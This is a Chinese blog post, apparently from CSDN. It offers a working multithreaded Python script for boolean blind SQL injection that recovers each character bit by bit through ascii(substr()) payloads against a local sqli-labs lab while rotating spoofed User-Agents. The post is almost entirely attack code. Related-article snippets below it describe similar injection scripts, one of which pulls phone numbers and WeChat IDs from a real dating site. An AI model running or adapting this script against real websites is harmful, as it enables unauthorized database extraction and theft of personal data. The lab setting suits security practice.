比二分法更OK的盲注多线程(python脚本)

最新推荐文章于 2022-11-18 19:50:41 发布
最新推荐文章于 2022-11-18 19:50:41 发布 1334 收藏 2
分类专栏: Python编程 文章标签: python SQL盲注 脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jpygx123/article/details/84328615
版权

 废话不多说直接上代码:

import threading
import requests
user_agent = [
            "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3"
]
class MyThread(threading.Thread):
    def __init__(self, func, args):
        threading.Thread.__init__(self)
        self.func = func
        self.args = args
    def getresult(self):
        return self.res
    def run(self):
        self.res = self.func(*self.args)
def asc(a,i,payload):
    asci = 2**i
    url = "http://127.0.0.1/2/Less-5/?id=1'and ascii(substr(("+payload+"),"+str(a)+",1))%26"+str(asci)+"="+str(asci)+ "--+"
    header = {'User-Agent': user_agent[i]}
    html = requests.get(url, headers=header)
    if html.text.find("You are in...........")!=-1:
        return asci
    return 0
def main():
    payload = input('请输入payload(比如select user()/user()/SELECT group_concat(SCHEMA_name) from information_schema.SCHEMATA):')
    a=1
    f=True
    char = ''
    while f:
        threads = []
        sum = 0
        for i in range(0,8):
            t = MyThread(asc, (a, i, payload))
            threads.append(t)
        for i in range(0,8):
            threads[i].start()
        for i in range(0,8):
            threads[i].join()
            sum = sum + threads[i].getresult()
        if sum ==0:
            f = False
        char = char +chr(sum)
        a = a+1
    print(char)
if __name__ == '__main__':
    main()

网站是自己搭建的sql-libs,自己根据需要修改payload吧。

 

 

阅读终点,创作起航,您可以撰写心得或摘录文章要点写篇博文。去创作
花自飘零丶水自流
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfshow web190 二分法盲注经典脚本 有单引号,利用回显不同
10-21
ctfshow web190 二分法盲注经典脚本 有单引号,利用回显不同
【CTF_流量日志分析】二分法盲注分析
serendipity1130的博客
10-16 1210
1.打开日志文件发现又是一道二分法盲注流量,观察任意几条: 分析过程: 当状态码位200的时候,表示正确,报错为404,所以第21位大于101正确,大于102报错,所以正确字符为101,所以盲注出来的字符串应该是状态码等于200时的字符或等于404时的ascii码减去1 2.根据以上分析写出脚本: import urllib.parse import requests,re f = open('日志里的秘密.log','r',encoding='gb18030',errors='ignore
pythonsqli-labs15的二分法时间盲注
Programmonkeykin的博客
12-11 3851
1.导入库。 2.按ASCII码从小到大编写常见的符号、字符、数字。 3.编写实验对应库的地址,这里的url根据自己的实际状况而言。 编写get_length函数: 其二分盲注实现的完整代码如下: Payload="admin'andif((length(({}))={}),sleep(2),if((length(({}))>{}),sleep(3),1))#".format(data_payload,n,data_payload,n) 即,如果我们定义的数据长度n刚好等于我们..
二分法实现SQL盲注
小菜猴子_x
09-12 725
因为在buu上做题,然后无奈研究二分法实现SQL盲注
二分法盲注
qq_43756333的博客
05-25 2117
在学sql盲注脚本的时候碰到了使用二分法盲注字段的情况,学习一下。 环境: [CISCN2019 华北赛区 Day2 Web1]Hack World 复现地址:BUUCTF 打开题目 直接告诉了flag在flag表和flag列里,让我们提交id。 这道题过滤了一些字段以及常用注入语句,可以用Burpsuite来fuzz测试一下,如下所示,长度为482的代表被过滤 最后使用的方法是异或注入,有关异或注入的原理,可参考异或注入 直接给出payload:1^(if((ascii(substr((select
python多线程结合二分法算法|命令注入与盲注
tempulcc的博客
09-28 547
实战python多线程结合二分法算法应用命令注入基于时间的盲注 本文采用threading、queue模块启用多线程,结合二分法算法思想(递归、非递归两种方法)实战natas的第16关、第17关,可大幅提升程序寻找通关密码的效率。 命令注入 URL:http://natas16.natas.labs.overthewire.org Username:natas16 Password:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh 源码: <? $key = ""; if(arr
非线性方程求根——二分法python
12-08
对于区间[a,b]上连续不断且f(a)·f(b)的函数y=f(x),通过不断地把函数f(x)的零点所在的区间一分为二,使区间的两个端点逐步逼近零点,进而得到零点近似值的方法叫二分法。 算法:当数据量很大适宜采用该...
多线程+二分法的巧用——通达OA SQL盲注1
08-03
声明由于传播、利此所提供的信息造成的任何直接或者间接的后果及损失,均由使者本负责,雷神众测以及章作者不为此承担任何责任。雷神众测拥有对此章的修改和解释权。如欲转
python二分法求平方根
12-22
前几天学完python的程序分支结构后,老师课后留了一个问题,用两种方法计算一个大于或等于 1 的实数 n 数的平方根。 描述 设计一个用二分法计算一个大于或等于 1 的实数 n 的平方根的函数sqrt_binary(n),计算精度...
Python实现二分法算法实例
09-22
主要介绍了Python实现二分法算法实例,本文先是介绍了算法规则,然后给出了实现例子,需要的朋友可以参考下
时间盲注python脚本(二分查找优化)支持cookie注入
qq_36915061的博客
12-02 809
时间盲注python脚本(二分查找优化)支持cookie注入 菜鸟自用,仅供参考 使用说明 可根据用途改payload中的select语句,字符型注入点有两种注入情况: 1、最后添加注释符 2、最后的字符添加单引号,与原语句中的单引号闭合 get_length和get_name可结合使用 可根据自己的猜解范围调整min和max import requests import dat...
Python学习笔记-Python多线程详解
qq_44653420的博客
12-29 1168
Python多线程详解
python多线程
weixin_57400332的博客
03-24 735
python多线程
过滤逗号的二分查找+多线程sql盲注脚本
ruyueattention
09-19 437
前言 之前在做渗透测试时,sqlmap跑出一个单引号闭合的sql注入,但当我想爆库、爆表时,不知道后台做了什么限制,sqlmap始终无法跑出来 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import
Python】面向Sqli-Labs Less15的布尔盲注二分法脚本
RexHa的博客
11-18 1177
python实现sqli-labs第15关post盲注二分法注入脚本(基于布尔盲注
mysql 盲注二分法python脚本
weixin_30384217的博客
04-29 1288
import urllib import urllib2 def doinject(payload): url = 'xxxxxxxxxxxxxxxxxxxxx' values = {'injection':payload,'inject':'Inject'} data = urllib.urlencode(values) #print d...
python mysql盲注脚本
夜班机器人的博客
07-26 2449
某相亲网漏洞,可盲注获得手机号和微信号。 功能1:爬取所有女性ID、年龄、月薪、照片URL 功能2:通过盲注方式获取对应ID的手机号和微信号 功能3:所有数据自动导入MYSQL 缺点:单线程
二分查找在sql盲注里面的应用
0verWatch的博客
08-27 2458
前言 最近在重新复习SQL注入用了sqllabs这个靶场,发现在做盲注的时候自己写的脚本,就一直自增去盲注的话时间花费太大,所以就在看了看二分查找在这一方面的应用 确实快了不少,很久没有写过小脚本就手有点生疏了,赶紧记录一下 正文 二分查找又称折半查找,优点是比较次数少,查找速度快,平均性能好;其缺点是要求待查表为有序表,且插入删除困难。因此,折半查找方法适用于不经常变动而查找频繁的有序列...
[极客大挑战 2019]FinalSQL(异或盲注二分法多线程
weixin_43610673的博客
06-16 565
点到第三个找到注入点,异或盲注,但这题很恶心,最后爆值的时候flag前面有很多无用信息,遂将这题当作脚本编写练习题,将嫖来的二分法脚本加上了多线程(只用二分法要跑10分钟) 这是别人博客嫖来的二分法注入脚本 https://www.cnblogs.com/wangtanzhi/p/12305052.html #sql injection.py # -*- coding: UTF-8 -*- import re import requests import string url = "http://1de
python 二分法_二分法查找的递归实现(python
最新发布
05-28
好的,下面是二分法查找的递归实现(python): ```python def binary_search(arr, low, high, x): # 基本判断 if high >= low: mid = (high + low) // 2 # 元素整好的中间位置 if arr[mid] == x: return mid # 元素小于中间位置的元素,只需要再比较左边的元素 elif arr[mid] > x: return binary_search(arr, low, mid - 1, x) # 元素大于中间位置的元素,只需要再比较右边的元素 else: return binary_search(arr, mid + 1, high, x) else: # 不存在 return -1 # 测试数组 arr = [ 2, 3, 4, 10, 40 ] x = 10 # 函数调用 result = binary_search(arr, 0, len(arr)-1, x) if result != -1: print("元素在数组中的索引为", str(result)) else: print("元素不在数组中") ``` 在这个函数中,我们首先判断数组是否为空。如果不为空,我们找到数组的中间元素。如果中间元素与要查找的元素相等,我们就返回中间元素的索引。如果中间元素大于要查找的元素,我们就递归地查找左半部分的元素。如果中间元素小于要查找的元素,我们就递归地查找右半部分的元素。如果要查找的元素不存在于数组中,我们就返回 -1。 希望这能够帮到你!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

花自飘零丶水自流

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值